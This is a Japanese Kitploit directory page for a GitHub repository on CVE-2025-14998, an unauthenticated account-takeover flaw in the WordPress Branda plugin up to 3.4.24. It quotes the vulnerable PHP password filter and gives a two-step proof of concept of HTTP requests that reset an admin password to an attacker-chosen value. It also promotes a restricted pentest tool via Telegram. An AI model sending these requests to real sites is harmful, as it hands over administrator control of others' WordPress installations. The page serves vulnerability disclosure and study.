Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-14998 — CVE-2025-14998 Wordpress Plugin - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - 未認証の権限昇格(アカウント乗っ取り経由) | Kitploit
ツール/GitHubGitHub/ktn1990/cve-2025-14998
パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証
GitHubktn1990/cve-2025-14998

CVE-2025-14998

CVE-2025-14998 Wordpress Plugin - Branda – White Label & Branding, Free Login Page Customizer <= 3.4.24 - 未認証の権限昇格(アカウント乗っ取り経由)

リポジトリを見る
27ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WordPress Branda – ホワイトラベル&ブランディング、無料ログインページカスタマイザー <= 3.4.24 - 認証なしのアカウント乗っ取りによる権限昇格

CVE-2025-14998 WordPress用Brandaプラグインは、バージョン3.4.24までの全バージョンにおいて、アカウント乗っ取りによる権限昇格の脆弱性があります。これは、プラグインがパスワード更新時にユーザーの身元を適切に検証しないことに起因します。このため、認証されていない攻撃者が管理者を含む任意のユーザーのパスワードを変更し、そのアカウントへのアクセス権を取得することが可能です。

WordPressの脆弱性や限定ペネトレーションテストツールについては、Telegram @KtN1990までご連絡ください。

🔍 根本原因分析

プラグインは、random_passwordフィルターにフックすることでWordPressのパスワード生成ロジックを上書きします。WordPressが安全なランダムパスワードを生成する代わりに、プラグインはユーザーが制御する入力で置き換えます。

脆弱なコード

root@kitploit:~
public function password_random_password_filter( $password ) {
    global $wpdb, $signup_password_use_encryption;

    if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
        $key = $_GET['key'];
    } elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
        $key = $_POST['key'];
    }

    if ( ! empty( $_POST['password_1'] ) ) {
        $password = $_POST['password_1'];
    } elseif ( ! empty( $key ) ) {
        $signup = $wpdb->get_row(
            $wpdb->prepare(
                "SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
                $key
            )
        );

        if ( ! ( empty( $signup ) || $signup->active ) ) {
            $meta = maybe_unserialize( $signup->meta );

            if ( ! empty( $meta['password'] ) ) {
                if ( 'yes' === $signup_password_use_encryption ) {
                    $password = $this->password_decrypt( $meta['password'] );
                } else {
                    $password = $meta['password'];
                }
            }
        }
    }

    return $password;
}

🧪 概念実証 (サニタイズ済み)

ステップ1 — 任意のパスワードでパスワードリセットをトリガー

root@kitploit:~
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded

user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password

password_1の値は攻撃者が制御する任意の文字列にすることができます。


ステップ2 — リセットキーと同じ値を使用してリセットを完了

root@kitploit:~
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local

✅ 結果

  • WordPressは攻撃者制御のパスワードを受け入れます
  • 管理者パスワードが変更されます
  • 攻撃者は影響を受けるユーザーとして認証できます

メールアクセスや有効なパスワードリセットトークンは必要ありません。


💥 影響

認証されていない攻撃者は以下を実行できます:

  • 任意のWordPressユーザーのパスワードをリセット
  • 管理者アカウントを乗っ取る
  • WordPressインストールの完全な制御を取得
  • プラグイン、テーマ、コンテンツを変更

連絡先

  • @KtN1990

その他の脆弱性については、Megatronをご確認ください!

Logo

  • 💣 Megatronとは?Megatronは、本格的なテスターやレッドチーム向けに設計された高度なペネトレーションテストツールです。インフラストラクチャの監査、スキャン、テストのいずれにおいても、Megatronは必要なパワーを提供します。

-🛡️ 最適な対象: – セキュリティ研究者 – ペネトレーションテスター – 倫理的ハッカー

  • 📦 ~230のレガシーリサーチモジュールを備えたメンテナンスライン。最近のスキャナーコアの改善により、安定性と検出能力が向上。

  • 🎯 目的: 許可されたセキュリティテスト、教育、防御研究、レッドチームトレーニングのために厳密に提供されます。このリリースは不正使用を目的としていません。配布は制限されており、確認と署名済みの責任ある使用同意書/NDAの後にのみアクセス可能です。

-🛡 責任あるアクセスポリシー(概要):

  1. 確認済みのセキュリティ専門家、企業セキュリティチーム、認定ラボ、またはトレーニングプロバイダーのみアクセス可能。
  2. 組織名、役割、公式メール(企業)、および合法的な目的を提供する必要があります。
  3. 検証と当社の責任ある使用同意書/NDAへの署名後、完全なダウンロードが許可されます。
  4. 不正使用はゼロトレランス — 悪意のある使用の証拠がある場合、取り消しと必要な報告が行われます。
  • 📩 連絡先/リクエスト/確認: @KtN1990 — 組織、役割、アクセス理由の簡潔な説明を含めてください。Telegram Channel

デモ

画像の代替テキスト

ライセンス

MIT

ツールをダウンロード